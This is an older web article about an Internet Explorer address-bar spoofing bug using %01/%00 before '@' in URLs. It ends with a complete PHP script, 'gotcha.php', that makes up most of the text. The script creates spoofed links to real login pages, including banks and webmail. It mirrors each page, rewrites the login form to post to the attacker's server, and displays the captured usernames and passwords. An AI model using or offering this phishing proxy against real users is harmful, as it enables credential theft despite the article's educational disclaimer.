Subverting Non-Secure Login Forms
by I. O. Hook
On December 9th, Secunia ( released details on yet another Internet Explorer vulnerability. This one allowed malicious web site owners to spoof what appears in the "Address:" blank of Internet Explorer 5, 5.5, and 6.
The vulnerability was caused due to an input validation error, which can be exploited by including the %01 and %00 URL encoded representations after the username and right before the @ character in an URL.
Successful exploitation allows a malicious person to display an arbitrary Fully-Qualified Domain Name (FQDN) in the address and status bars, which is different from the actual location of the page.
This bug, combined with the effects of lazy site operators who hang their login forms out on non-secure web pages, and ignorant users who depend on third-party link lists or trust URLs they receive in their e-mail, can really add up to disaster.
Microsoft issued a patch for IE on January 13th. But this little bit of PHP shows just how easy it was (and still is on unpatched browsers) to grab logins and passwords.
If you're a user, don't use IE. If you must, ever trust a link from a web site or (even worse) your e-mail. For best results, type the URL into the "Address:" blank by hand, every time.
If you're an operator, please put your login form on a secure page and don't leave it hanging in the breeze for unscrupulous middlemen to mirror and possibly exploit.
This demonstration should be used for educational purposes only; researching the legal ramifications of actually grabbing passwords with this exploit are left as an exercise for the student.
<?php # here are a few links to get you started - most non-static URLs # with login forms that use <input type="password"> will work $dest[] = "Slashdot"; $link[] = ""; $dest[] = "Kuro5hin"; $link[] = ""; $dest[] = "Yahoo!"; $link[] = ""; $dest[] = "America On-Line"; $link[] = ""; $dest[] = "NetZero"; $link[] = ""; $dest[] = "Wells Fargo Bank"; $link[] = ""; $dest[] = "Neverwinter Nights"; $link[] = ""; # has somebody submitted our form? if (isset($the_site_you_really_wanted)) { print "<html><body>\n"; print "<b>Be afraid. Be very afraid.</b>\n"; print "<p>\n"; print "You just gave me your login and password for the following Web site:\n"; print "<p>\n"; print "<ul>\n"; foreach ($_POST as $k => $v) { print "<li>$k: $v</li>\n"; } foreach ($_GET as $k => $v) { print "<li>$k: $v</li>\n"; } print "</ul>\n"; print "<b>Have a nice day!</b>\n"; print "</body></html>\n"; exit(); } # if one of our links was not submitted, print the list of links if (!isset($p)) { print "<html><body>\n"; print "<b>Useful Links</b>\n"; print "<ul>\n"; $i = 0; foreach ($dest as $c) { $t = $link[$i] . "%00@" . $_SERVER["SERVER_NAME"] . $PHP_SELF . "?p=" . $link[$i]; print "<li><a href=\"$t\">$dest[$i]</a></li>\n"; $i++; } print "</ul>\n"; print "</body></html>\n"; } else { # here we go ... some eager sucker has followed one of our links # first, parse the URL in case we need to supply a base href later $url = parse_url($p); $base_href = $url[scheme] . "://" . $url[host] . "/"; # go grab the page $handle = fopen($p, "r"); $contents = ""; do { $chunk = fread($handle, 8192); if (strlen($chunk) == 0) { break; } $contents .= $chunk; } while (true); fclose($handle); # stick it all in $data $data = explode("\n", $contents); # go through $data line by line for ($i = 0; $i < count($data); $i++) { if (stristr($data[$i], "<base")) { # found base href $found_base_href = 1; } if (stristr($data[$i], "<form") && !isset($found_password)) { # save the line number where the form started $start_line = $i; # we've found a form to look at $in_form = 1; } if (isset($in_form) && $in_form) { # we're in the form if (stristr($data[$i], "type") && stristr($data[$i], "password")) { # we've found the password blank $found_password = 1; } } if (stristr($data[$i], "</form")) { # we're out of the form $in_form = 0; if (isset($found_password)) { # we're done break; } } } if (isset($found_password)) { # we found the password entry line; go back and substitute our form action $data[$start_line] = "<form method=\"post\" action=\"http://" . $_SERVER["SERVER_NAME"] . $PHP_SELF . "\"><input type=\"hidden\" name=\"the_site_you_really_wanted\" value=\"$p\">"; } # dump the compromised page to the client's browser foreach ($data as $line) { print "$line"; print "\n"; if (stristr($line, "<head") && !isset($found_base_href)) { print "<base href=\"$base_href\">\n"; } } } ?>Code: gotcha.php